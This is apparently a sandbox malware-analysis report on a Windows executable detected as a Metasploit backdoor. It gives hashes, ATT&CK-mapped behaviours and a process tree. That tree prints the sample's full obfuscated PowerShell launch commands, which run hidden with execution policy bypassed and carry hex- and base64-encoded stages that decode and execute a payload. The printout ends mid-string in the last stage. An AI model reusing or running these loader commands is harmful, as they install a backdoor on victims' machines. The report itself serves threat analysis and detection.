metasploit | 84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4

Analysis

max time kernel
137s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-11-2024 07:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe
Size

421KB
MD5

131270fa068900e6e40c53dd02c528bd
SHA1

f6cbd3bee1ca34059160dfde399a9c1a484f3a98
SHA256

84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4
SHA512

5bd8184316b92757e498f8b2ec49066e1bbbc877d8d87ee6eed214f7f8a68af3b729cb0b3d86db5652c0861352ab7f8be8c944cc722555061803a10934e09e9c
SSDEEP

6144:Pgxu6xcGEWuNas5t38dX6p4098E4FU7kprPcnFOHuln+Otc+EkzI8jSejCE8aKPy:Pgg6xox5nD3FhuE/RdoM/LOuucLRr

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1720	pOWErSheLl.exe
4068	powershell.exe
1152	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOWErSheLl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1720	pOWErSheLl.exe
1720	pOWErSheLl.exe
4068	powershell.exe
4068	powershell.exe
1152	powershell.exe
1152	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1720	pOWErSheLl.exe
Token: SeDebugPrivilege	4068	powershell.exe
Token: SeDebugPrivilege	1152	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1296 wrote to memory of 1720	1296	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe	85
PID 1296 wrote to memory of 1720	1296	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe	85
PID 1296 wrote to memory of 1720	1296	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe	85
PID 1720 wrote to memory of 4068	1720	pOWErSheLl.exe	87
PID 1720 wrote to memory of 4068	1720	pOWErSheLl.exe	87
PID 1720 wrote to memory of 4068	1720	pOWErSheLl.exe	87
PID 4068 wrote to memory of 1152	4068	powershell.exe	91
PID 4068 wrote to memory of 1152	4068	powershell.exe	91
PID 4068 wrote to memory of 1152	4068	powershell.exe	91
PID 1152 wrote to memory of 4424	1152	powershell.exe	95
PID 1152 wrote to memory of 4424	1152	powershell.exe	95
PID 1152 wrote to memory of 4424	1152	powershell.exe	95
PID 4424 wrote to memory of 4916	4424	csc.exe	96
PID 4424 wrote to memory of 4916	4424	csc.exe	96
PID 4424 wrote to memory of 4916	4424	csc.exe	96

C:\Users\Admin\AppData\Local\Temp\84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe
"C:\Users\Admin\AppData\Local\Temp\84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1296
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pOWErSheLl.exe
  pOWErSheLl -Wi hIDdEn -CoMMAN "(-jOin(('262828273720302033203420392035203220382035203120362030272d7265706c414345275c772b272c277b247b307d7d272d5245704c4163452720272c2727292d662765272c2762272c2772272c2774272c272d272c2761272c276c272c2773272c2769272c27762729206f623735534c53334c3758442033343b262828273820342036203720322031203920332031203520302034272d5245506c614365275c772b272c277b247b307d7d272d5265506c4143452720272c2727292d66276c272c2761272c2776272c2769272c2765272c2762272c2774272c272d272c2773272c27722729205939364171686e4b507573502031343b2e282e28277b317d7b307d272d6627436d272c2767272928277365542d5641272b27724961626c45272929205a704955564d7a396d6a6c6b2032343b2e2828273520312037203020382036203920322036203420332031272d5245706c414365275c772b272c277b247b307d7d272d7265706c6143652720272c2727292d66272d272c2765272c2769272c276c272c2762272c2773272c2761272c2774272c2776272c27722729206f6a74414777457841314d78282828282e28274745542d56417249272b274142272b276c452729206f623735534c53334c375844292e282776614c75272b276527292b3131292d41535b636861725d292e2827546f735472272b27696e4727292e496e766f6b6528292b2828282e28277b317d7b307d7b327d272d66276941272c276745742d566172272c27624c652729205939364171686e4b50757350292e282776614c272b2775272b274527292b3837292d41535b436861525d292e28277b337d7b317d7b327d7b347d7b307d272d662747272c2754272c275269272c27546f53272c274e27292e696e764f4b4528292b2828282e2828273820322033203620352039203420372039203020312032272d5245704c416365275c772b272c277b247b307d7d272d7245704c6143452720272c2727292d662762272c276c272c2765272c2774272c2772272c2776272c272d272c2769272c2767272c27612729205a704955564d7a396d6a6c6b292e282827332034203020322031272d7265506c416345275c772b272c277b247b307d7d272d7265706c6163652720272c2727292d66276c272c2765272c2775272c2776272c276127292b3735292d41535b434861725d292e28277b317d7b307d272d6627537452494e67272c27544f27292e696e564f4b452829293b706f7765727368656c6c202d4e4f6e694e544552614374202d6e6f4c4f474f202d4e4f70724f66202d77696e446f772068494464454e202d65584563755469204279506173732028262828273520342031203920382030203220362030203320372034272d7245504c614345275c772b272c277b247b307d7d272d5245506c4143452720272c2727292d662761272c2774272c2772272c2762272c2765272c2767272c2769272c276c272c2776272c272d2729206f6a74414777457841314d78292e282827302033203120322034272d7245504c416345275c772b272c277b247b307d7d272d5265704c4163652720272c2727292d662776272c276c272c2775272c2761272c276527292e2827744f5354272b2772272b27694e4727292e496e766f4b6528294a67416f414334414b41416e414563414a774172414363415177416e414373414a77424e414363414b51416f414363416577417741483041657741794148304165774178414830414a774174414759414a77427a414363414c41416e414755414a774173414363415a51425541433041646742684146494161514268414549416241416e41436b414b514167414559415151426e41466b416141417741476b414d4142444144634157674261414341414f514137414359414b41416e41484d415251425541433041566742684148494161514268414363414b77416e414549414a774172414363415441426c414363414b5141674146494161514178414645416341424b414777415a5142684148494164414243414341414d774179414473414c67416f414363416377426c414851414a774172414363414c514232414545414a7741724143634155674270414545415167416e414373414a77424d414363414b77416e414555414a7741704143414153774249414545416377424f4145494161514246414763415451424b41456f4149414133414473414a67416f4143634155774246414651414c51416e414373414a774257414545416367416e414373414a77424a414745415967424d414363414b77416e414755414a774170414341415251426141444d41625142364145304154514255414549415a67423341474d414b41416f414367414b41416d414367414a77423741444541665142374144414166514237414449416651416e414330415a67416e414851414c514232414363414c41416e414763415251416e414377414a77424241484941535142424147494154414246414363414b514167414559415151426e41466b416141417741476b414d414244414463415767426141436b414c67416f414367414a774179414341414d7741674144414149414130414341414d51416e4143304163674246414641415441426841474d415a51416e4146774164774172414363414c41416e414873414a4142374144414166514239414363414c51427941475541554142734145454159774246414363414941416e414377414a77416e41436b414c51426d414363416241416e414377414a77426c414363414c41416e414859414a774173414363415951416e414377414a774231414363414b51417241444d414e674170414330415151427a4146734151774249414545415567426441436b414c67416f414367414a77417a414341414d414167414451414941417a414341414e6741674144494149414131414341414d51416e414330416367426c414641416241424241474d415251416e4146774164774172414363414c41416e414873414a4142374144414166514239414363414c51427941455541634142734147454151774246414363414941416e414377414a77416e41436b414c51426d414363416277416e414377414a77426e414363414c41416e41476b414a774173414363416441416e414377414a77427a414363414c41416e414734414a774173414363416367416e41436b414c6742704145344156674276414573415251416f41436b414b77416f414367414b41416d414367414a7742484145554156414174414659415151427941476b414a7741724143634159514269414577415a51416e41436b414941425341476b414d514252414841415367427341475541595142794148514151674170414334414b41416e414873414d514239414873414d414239414363414c51426d414363415a51416e414377414a7742324147454154414231414363414b514172414459414f51417041433041595142544146734151774249414745416367426441436b414c67416f414363416577417741483041657741784148304165774179414830416577417a414830414a774174414759414a774230414538414a774173414363416377416e414377414a774230414849416151424f414363414c41416e414563414a774170414334415351424f414659415477424c414555414b414170414373414b41416f414367414a67416f414359414b41416f414363414d6741674144454149414177414363414c514279414555416341424d41474541517742464143634158414233414373414a774173414363416577416b414873414d414239414830414a774174414849415a514277414777415951426a414755414a774167414363414c41416e414363414b514174414759414a774274414363414c41416e41474d414a774173414363415a77416e41436b414b41416e414563415a5142554143304164674242414363414b77416e4146494153514268414549414a774172414363416241416e414373414a77426c414363414b5141704143414153774249414545416377424f4145494161514246414763415451424b41456f414b514175414367414a7742324147454162414231414555414a774170414373414f51417941436b414c51426841464d415777426a4147674159514279414630414b514175414367414a774230414538414a7741724143634155774255414849414a774172414363415351416e414373414a774275414563414a774170414334415351424f4148594162774272414755414b41417041436b414f774251414738416477426c414849416377426f414555416241424d414341414c5142754145384154674270414534415641426c414341414c51424f414738415441427641456341627741674143304162674276414841415567427641455941535141674143304156774167414767416151426b414551415251424f414341414c514246414667415a51426a414655415641416741454941575142774147454155774254414341414b414175414367414a77423741444141665142374144454166514237414449416651416e414330415a67416e41476341525142554143304156674242414649416151416e414377414a774268414749416241416e414377414a77426c414363414b514167414555415767417a414730416567424e4145304156414243414759416477426a41436b414c67416f414363416577417941483041657741774148304165774178414830414a774174414759414a774268414777414a774173414363415651426c414363414c41416e414859414a774170414334414b41416e414873414d514239414873414d674239414873414d414239414363414c51426d414363416267426e414363414c41416e4146514154774254414851414a7741734143634155674270414363414b51417541476b41546742324147384161774246414367414b51416f41467341597742494145454155674262414630415851416f414367415777426a41476741515142794146734158514264414367414c67416f414363416577417841483041657741794148304165774177414830416577417a414830414a774174414759414a774244414363414c41416e4147344152514233414330415477426941476f414a774173414363415a51416e414377414a774255414363414b514167414367414a77424f4147554156414175414863414a774172414363415a51424341474d41624142704147554162674255414363414b514170414334414b41416e41475141547742334145344162414250414363414b77416e414745415a4142544148514163674270414363414b77416e414734414a774172414363415a77416e41436b414c67424a4147344164674250414773415a51416f414351415a514275414859414f6742304147554162514277414373414a7742634148594165514235414849415441425241465541655142524146494154674249414363414b514170414877414a514237414351415a67424f41476b416341424c414573415977427641446341515142774145304150514177414830416577416b414638414c51426941486741547742534143634151774134414751415441426c4148514155774234414667415a51424a414859414e674274414751414f51426b414551415567425a414649416451426d4147634163674245414551414a774262414351415a67424f41476b416341424c41457341597742764144634151514277414530414b774172414355414d6741334146304166514170414330416167427641476b416267416e414363414b514137414649415a514274414738416467426c41433041535142304147554162514167414351415a514275414859414f6742304147554162514277414363415841423241486b4165514279414577415551425641486b4155514253414534415341416e41413d3d'-spLIt'(?<=\G.{2})(?!$)')|%{[CONvERT]::('{0}{2}{1}'-f'T','Nt16','OI').INVoKE(($_),16)-as[cHar]}))|&('{2}{0}{3}{1}'-f'vOKE-e','ioN','in','xPreSS')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1720
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOniNTERaCt -noLOGO -NOprOf -winDow hIDdEN -eXEcuTi ByPass -ec JgAoAC4AKAAnAEcAJwArACcAQwAnACsAJwBNACcAKQAoACcAewAwAH0AewAyAH0AewAxAH0AJwAtAGYAJwBzACcALAAnAGUAJwAsACcAZQBUAC0AdgBhAFIAaQBhAEIAbAAnACkAKQAgAEYAQQBnAFkAaAAwAGkAMABDADcAWgBaACAAOQA7ACYAKAAnAHMARQBUAC0AVgBhAHIAaQBhACcAKwAnAEIAJwArACcATABlACcAKQAgAFIAaQAxAFEAcABKAGwAZQBhAHIAdABCACAAMwAyADsALgAoACcAcwBlAHQAJwArACcALQB2AEEAJwArACcAUgBpAEEAQgAnACsAJwBMACcAKwAnAEUAJwApACAASwBIAEEAcwBOAEIAaQBFAGcATQBKAEoAIAA3ADsAJgAoACcAUwBFAFQALQAnACsAJwBWAEEAcgAnACsAJwBJAGEAYgBMACcAKwAnAGUAJwApACAARQBaADMAbQB6AE0ATQBUAEIAZgB3AGMAKAAoACgAKAAmACgAJwB7ADEAfQB7ADAAfQB7ADIAfQAnAC0AZgAnAHQALQB2ACcALAAnAGcARQAnACwAJwBBAHIASQBBAGIATABFACcAKQAgAEYAQQBnAFkAaAAwAGkAMABDADcAWgBaACkALgAoACgAJwAyACAAMwAgADAAIAA0ACAAMQAnAC0AcgBFAFAATABhAGMAZQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQByAGUAUABsAEEAYwBFACcAIAAnACwAJwAnACkALQBmACcAbAAnACwAJwBlACcALAAnAHYAJwAsACcAYQAnACwAJwB1ACcAKQArADMANgApAC0AQQBzAFsAQwBIAEEAUgBdACkALgAoACgAJwAzACAAMAAgADQAIAAzACAANgAgADIAIAA1ACAAMQAnAC0AcgBlAFAAbABBAGMARQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQByAEUAcABsAGEAQwBFACcAIAAnACwAJwAnACkALQBmACcAbwAnACwAJwBnACcALAAnAGkAJwAsACcAdAAnACwAJwBzACcALAAnAG4AJwAsACcAcgAnACkALgBpAE4AVgBvAEsARQAoACkAKwAoACgAKAAmACgAJwBHAEUAVAAtAFYAQQByAGkAJwArACcAYQBiAEwAZQAnACkAIABSAGkAMQBRAHAASgBsAGUAYQByAHQAQgApAC4AKAAnAHsAMQB9AHsAMAB9ACcALQBmACcAZQAnACwAJwB2AGEATAB1ACcAKQArADYAOQApAC0AYQBTAFsAQwBIAGEAcgBdACkALgAoACcAewAwAH0AewAxAH0AewAyAH0AewAzAH0AJwAtAGYAJwB0AE8AJwAsACcAcwAnACwAJwB0AHIAaQBOACcALAAnAEcAJwApAC4ASQBOAFYATwBLAEUAKAApACsAKAAoACgAJgAoACYAKAAoACcAMgAgADEAIAAwACcALQByAEUAcABMAGEAQwBFACcAXAB3ACsAJwAsACcAewAkAHsAMAB9AH0AJwAtAHIAZQBwAGwAYQBjAGUAJwAgACcALAAnACcAKQAtAGYAJwBtACcALAAnAGMAJwAsACcAZwAnACkAKAAnAEcAZQBUAC0AdgBBACcAKwAnAFIASQBhAEIAJwArACcAbAAnACsAJwBlACcAKQApACAASwBIAEEAcwBOAEIAaQBFAGcATQBKAEoAKQAuACgAJwB2AGEAbAB1AEUAJwApACsAOQAyACkALQBhAFMAWwBjAGgAYQByAF0AKQAuACgAJwB0AE8AJwArACcAUwBUAHIAJwArACcASQAnACsAJwBuAEcAJwApAC4ASQBOAHYAbwBrAGUAKAApACkAOwBQAG8AdwBlAHIAcwBoAEUAbABMACAALQBuAE8ATgBpAE4AVABlACAALQBOAG8ATABvAEcAbwAgAC0AbgBvAHAAUgBvAEYASQAgAC0AVwAgAGgAaQBkAEQARQBOACAALQBFAFgAZQBjAFUAVAAgAEIAWQBwAGEAUwBTACAAKAAuACgAJwB7ADAAfQB7ADEAfQB7ADIAfQAnAC0AZgAnAGcARQBUAC0AVgBBAFIAaQAnACwAJwBhAGIAbAAnACwAJwBlACcAKQAgAEUAWgAzAG0AegBNAE0AVABCAGYAdwBjACkALgAoACcAewAyAH0AewAwAH0AewAxAH0AJwAtAGYAJwBhAGwAJwAsACcAVQBlACcALAAnAHYAJwApAC4AKAAnAHsAMQB9AHsAMgB9AHsAMAB9ACcALQBmACcAbgBnACcALAAnAFQATwBTAHQAJwAsACcAUgBpACcAKQAuAGkATgB2AG8AawBFACgAKQAoAFsAYwBIAEEAUgBbAF0AXQAoACgAWwBjAGgAQQByAFsAXQBdACgALgAoACcAewAxAH0AewAyAH0AewAwAH0AewAzAH0AJwAtAGYAJwBDACcALAAnAG4ARQB3AC0ATwBiAGoAJwAsACcAZQAnACwAJwBUACcAKQAgACgAJwBOAGUAVAAuAHcAJwArACcAZQBCAGMAbABpAGUAbgBUACcAKQApAC4AKAAnAGQATwB3AE4AbABPACcAKwAnAGEAZABTAHQAcgBpACcAKwAnAG4AJwArACcAZwAnACkALgBJAG4AdgBPAGsAZQAoACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcAHYAeQB5AHIATABRAFUAeQBRAFIATgBIACcAKQApAHwAJQB7ACQAZgBOAGkAcABLAEsAYwBvADcAQQBwAE0APQAwAH0AewAkAF8ALQBiAHgATwBSACcAQwA4AGQATABlAHQAUwB4AFgAZQBJAHYANgBtAGQAOQBkAEQAUgBZAFIAdQBmAGcAcgBEAEQAJwBbACQAZgBOAGkAcABLAEsAYwBvADcAQQBwAE0AKwArACUAMgA3AF0AfQApAC0AagBvAGkAbgAnACcAKQA7AFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAZQBuAHYAOgB0AGUAbQBwACcAXAB2AHkAeQByAEwAUQBVAHkAUQBSAE4ASAAnAA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4068
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nONiNTe -NoLoGo -nopRoFI -W hidDEN -EXecUT BYpaSS -ec KAAtAGoAbwBJAG4AKAAoACcAMgA0ADUANwA2AGEANQA2ADUAMAA0AGEANgAzADUAMgA3ADAAMwA2ADQAZgA2ADUAMwAwADMAZAAyADYAMgA4ADIANgAyADgAMgA3ADcAYgAzADAANwBkADIANwAyAGQANgA2ADIANwA0ADcANgAzADYAZAAyADcAMgA5ADIAOAAyADgAMgA3ADMAMwAyADAAMwAwADIAMAAzADAAMgAwADMANAAyADAAMwAxADIAMAAzADUAMgAwADMANgAyADAAMwAyADIANwAyAGQANQAyADQANQA1ADAANgBjADQAMQA0ADMANAA1ADIANwA1AGMANwA3ADIAYgAyADcAMgBjADIANwA3AGIAMgA0ADcAYgAzADAANwBkADcAZAAyADcAMgBkADUAMgA2ADUANwAwADQAYwA2ADEANAAzADQANQAyADcAMgAwADIANwAyAGMAMgA3ADIANwAyADkAMgBkADYANgAyADcANgA0ADIANwAyAGMAMgA3ADcANAAyADcAMgBjADIANwA2ADUAMgA3ADIAYwAyADcANgAxADIANwAyAGMAMgA3ADIAZAAyADcAMgBjADIANwA3ADkAMgA3ADIAYwAyADcANwAwADIANwAyADkAMgA5ADIAMAAyAGQANgBkADIAMAAyADcANQBiADQANAA2AGMANgBjADQAOQA2AGQANwAwADYAZgA3ADIANwA0ADIAOAAyADIANgBiADYANQA3ADIANgBlADYANQA2AGMAMwAzADMAMgAyAGUANgA0ADYAYwA2AGMAMgAyADIAOQA1AGQAMgAwADcAMAA3ADUANgAyADYAYwA2ADkANgAzADIAMAA3ADMANwA0ADYAMQA3ADQANgA5ADYAMwAyADAANgA1ADcAOAA3ADQANgA1ADcAMgA2AGUAMgAwADQAOQA2AGUANwA0ADUAMAA3ADQANwAyADIAMAA1ADYANgA5ADcAMgA3ADQANwA1ADYAMQA2AGMANAAxADYAYwA2AGMANgBmADYAMwAyADgANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADYAYwA3ADAANAAxADYANAA2ADQANwAyADYANQA3ADMANwAzADIAYwAyADAANwA1ADYAOQA2AGUANwA0ADIAMAA2ADQANwA3ADUAMwA2ADkANwBhADYANQAyAGMAMgAwADcANQA2ADkANgBlADcANAAyADAANgA2ADYAYwA0ADEANgBjADYAYwA2AGYANgAzADYAMQA3ADQANgA5ADYAZgA2AGUANQA0ADcAOQA3ADAANgA1ADIAYwAyADAANwA1ADYAOQA2AGUANwA0ADIAMAA2ADYANgBjADUAMAA3ADIANgBmADcANAA2ADUANgAzADcANAAyADkAMwBiADUAYgA0ADQANgBjADYAYwA0ADkANgBkADcAMAA2AGYANwAyADcANAAyADgAMgAyADYAYgA2ADUANwAyADYAZQA2ADUANgBjADMAMwAzADIAMgBlADYANAA2AGMANgBjADIAMgAyADkANQBkADIAMAA3ADAANwA1ADYAMgA2AGMANgA5ADYAMwAyADAANwAzADcANAA2ADEANwA0ADYAOQA2ADMAMgAwADYANQA3ADgANwA0ADYANQA3ADIANgBlADIAMAA0ADkANgBlADcANAA1ADAANwA0ADcAMgAyADAANAAzADcAMgA2ADUANgAxADcANAA2ADUANQA0ADYAOAA3ADIANgA1ADYAMQA2ADQAMgA4ADQAOQA2AGUANwA0ADUAMAA3ADQANwAyADIAMAA2AGMANwAwADUANAA2ADgANwAyADYANQA2ADEANgA0ADQAMQA3ADQANwA0ADcAMgA2ADkANgAyADcANQA3ADQANgA1ADcAMwAyAGMAMgAwADcANQA2ADkANgBlADcANAAyADAANgA0ADcANwA1ADMANwA0ADYAMQA2ADMANgBiADUAMwA2ADkANwBhADYANQAyAGMAMgAwADQAOQA2AGUANwA0ADUAMAA3ADQANwAyADIAMAA2AGMANwAwADUAMwA3ADQANgAxADcAMgA3ADQANAAxADYANAA2ADQANwAyADYANQA3ADMANwAzADIAYwAyADAANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADYAYwA3ADAANQAwADYAMQA3ADIANgAxADYAZAA2ADUANwA0ADYANQA3ADIAMgBjADIAMAA3ADUANgA5ADYAZQA3ADQAMgAwADYANAA3ADcANAAzADcAMgA2ADUANgAxADcANAA2ADkANgBmADYAZQA0ADYANgBjADYAMQA2ADcANwAzADIAYwAyADAANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADYAYwA3ADAANQA0ADYAOAA3ADIANgA1ADYAMQA2ADQANAA5ADYANAAyADkAMwBiADUAYgA0ADQANgBjADYAYwA0ADkANgBkADcAMAA2AGYANwAyADcANAAyADgAMgAyADYAZAA3ADMANwA2ADYAMwA3ADIANwA0ADIAZQA2ADQANgBjADYAYwAyADIAMgA5ADUAZAAyADAANwAwADcANQA2ADIANgBjADYAOQA2ADMAMgAwADcAMwA3ADQANgAxADcANAA2ADkANgAzADIAMAA2ADUANwA4ADcANAA2ADUANwAyADYAZQAyADAANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADYAZAA2ADUANgBkADcAMwA2ADUANwA0ADIAOAA0ADkANgBlADcANAA1ADAANwA0ADcAMgAyADAANgA0ADYANQA3ADMANwA0ADIAYwAyADAANwA1ADYAOQA2AGUANwA0ADIAMAA3ADMANwAyADYAMwAyAGMAMgAwADcANQA2ADkANgBlADcANAAyADAANgAzADYAZgA3ADUANgBlADcANAAyADkAMwBiADIANwAyADAAMgBkADYAZQA2ADEANgBkADYANQAyADAAMgA3ADUANwA2ADkANgBlADMAMwAzADIAMgA3ADIAMAAyAGQANgBlADcAMwAyADAANQA3ADYAOQA2AGUAMwAzADMAMgA0ADYANwA1ADYAZQA2ADMANwA0ADYAOQA2AGYANgBlADcAMwAyADAAMgBkADcAMAA2ADEANwAzADMAYgA1AGIANgAyADUAOQA1ADQANgA1ADUAYgA1AGQANQBkADIANAA2ADUANwA3ADcAMAA2AGMANgA0ADQAMwAzADAANgAyADUAOQA2ADkANwAwADMAMwAzAGQAMwAwADcAOAA2ADYANgAzADIAYwAzADAANwA4ADYANQAzADgAMgBjADMAMAA3ADgAMwA4ADMAMgAyAGMAMwAwADcAOAAzADAAMwAwADIAYwAzADAANwA4ADMAMAAzADAAMgBjADMAMAA3ADgAMwAwADMAMAAyAGMAMwAwADcAOAAzADYAMwAwADIAYwAzADAANwA4ADMAOAAzADkAMgBjADMAMAA3ADgANgA1ADMANQAyAGMAMwAwADcAOAAzADMAMwAxADIAYwAzADAANwA4ADYAMwAzADAAMgBjADMAMAA3ADgAMwA2ADMANAAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANQAzADAAMgBjADMAMAA3ADgAMwAzADMAMAAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANQAzADIAMgBjADMAMAA3ADgAMwAwADYAMwAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANQAzADIAMgBjADMAMAA3ADgAMwAxADMANAAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANwAzADIAMgBjADMAMAA3ADgAMwAyADMAOAAyAGMAMwAwADcAOAAzADAANgA2ADIAYwAzADAANwA4ADYAMgAzADcAMgBjADMAMAA3ADgAMwA0ADYAMQAyAGMAMwAwADcAOAAzADIAMwA2ADIAYwAzADAANwA4ADMAMwAzADEAMgBjADMAMAA3ADgANgA2ADYANgAyAGMAMwAwADcAOAA2ADEANgAzADIAYwAzADAANwA4ADMAMwA2ADMAMgBjADMAMAA3ADgAMwA2ADMAMQAyAGMAMwAwADcAOAAzADcANgAzADIAYwAzADAANwA4ADMAMAAzADIAMgBjADMAMAA3ADgAMwAyADYAMwAyAGMAMwAwADcAOAAzADIAMwAwADIAYwAzADAANwA4ADYAMwAzADEAMgBjADMAMAA3ADgANgAzADYANgAyAGMAMwAwADcAOAAzADAANgA0ADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgAzADMANwAyAGMAMwAwADcAOAA2ADUAMwAyADIAYwAzADAANwA4ADYANgAzADIAMgBjADMAMAA3ADgAMwA1ADMAMgAyAGMAMwAwADcAOAAzADUAMwA3ADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA1ADMAMgAyAGMAMwAwADcAOAAzADEAMwAwADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA0ADYAMQAyAGMAMwAwADcAOAAzADMANgAzADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA0ADYAMwAyAGMAMwAwADcAOAAzADEAMwAxADIAYwAzADAANwA4ADMANwAzADgAMgBjADMAMAA3ADgANgA1ADMAMwAyAGMAMwAwADcAOAAzADQAMwA4ADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgA0ADMAMQAyAGMAMwAwADcAOAAzADUAMwAxADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA1ADMAOQAyAGMAMwAwADcAOAAzADIAMwAwADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgA0ADMAMwAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANAAzADkAMgBjADMAMAA3ADgAMwAxADMAOAAyAGMAMwAwADcAOAA2ADUAMwAzADIAYwAzADAANwA4ADMAMwA2ADEAMgBjADMAMAA3ADgAMwA0ADMAOQAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMAMwAzADQAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADAAMwAxADIAYwAzADAANwA4ADYANAAzADYAMgBjADMAMAA3ADgAMwAzADMAMQAyAGMAMwAwADcAOAA2ADYANgA2ADIAYwAzADAANwA4ADYAMQA2ADMAMgBjADMAMAA3ADgANgAzADMAMQAyAGMAMwAwADcAOAA2ADMANgA2ADIAYwAzADAANwA4ADMAMAA2ADQAMgBjADMAMAA3ADgAMwAwADMAMQAyAGMAMwAwADcAOAA2ADMAMwA3ADIAYwAzADAANwA4ADMAMwAzADgAMgBjADMAMAA3ADgANgA1ADMAMAAyAGMAMwAwADcAOAAzADcAMwA1ADIAYwAzADAANwA4ADYANgAzADYAMgBjADMAMAA3ADgAMwAwADMAMwAyAGMAMwAwADcAOAAzADcANgA0ADIAYwAzADAANwA4ADYANgAzADgAMgBjADMAMAA3ADgAMwAzADYAMgAyAGMAMwAwADcAOAAzADcANgA0ADIAYwAzADAANwA4ADMAMgAzADQAMgBjADMAMAA3ADgAMwA3ADMANQAyAGMAMwAwADcAOAA2ADUAMwA0ADIAYwAzADAANwA4ADMANQAzADgAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADUAMwA4ADIAYwAzADAANwA4ADMAMgAzADQAMgBjADMAMAA3ADgAMwAwADMAMQAyAGMAMwAwADcAOAA2ADQAMwAzADIAYwAzADAANwA4ADMANgAzADYAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADAANgAzADIAYwAzADAANwA4ADMANAA2ADIAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADUAMwA4ADIAYwAzADAANwA4ADMAMQA2ADMAMgBjADMAMAA3ADgAMwAwADMAMQAyAGMAMwAwADcAOAA2ADQAMwAzADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwAwADMANAAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgA0ADMAMAAyAGMAMwAwADcAOAAzADgAMwA5ADIAYwAzADAANwA4ADMANAAzADQAMgBjADMAMAA3ADgAMwAyADMANAAyAGMAMwA